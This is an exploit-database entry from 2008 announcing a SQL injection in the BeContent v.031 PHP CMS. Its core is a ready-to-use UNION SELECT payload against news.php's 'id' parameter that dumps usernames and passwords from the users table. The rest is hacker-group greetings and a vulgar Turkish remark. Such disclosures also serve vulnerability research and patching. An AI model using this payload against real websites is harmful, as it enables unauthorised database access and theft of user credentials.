BeContent 031 - 'id' SQL Injection

EDB-ID:

5170




Platform:

PHP

Date:

2008-02-21


Founder By Cr@zy_King

HackShow.Us

BeContent v.031 (id) Remote Sql  Vuln.

Down : http://code.google.com/p/becontent/downloads/list?id_menu=9

Exploit:

news.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users

Greatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine

Not : Ayyildiz 'da Askeri Şurada Yayinladıgım Açıkları Kullananların hepsinin a.q yyim bunlarıda kullananlarında a.qyyim

Alayına İsyan Kralına Hodri Meydan Sozum Metehan'a ;) Hadi eyw.

side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)

# milw0rm.com [2008-02-21]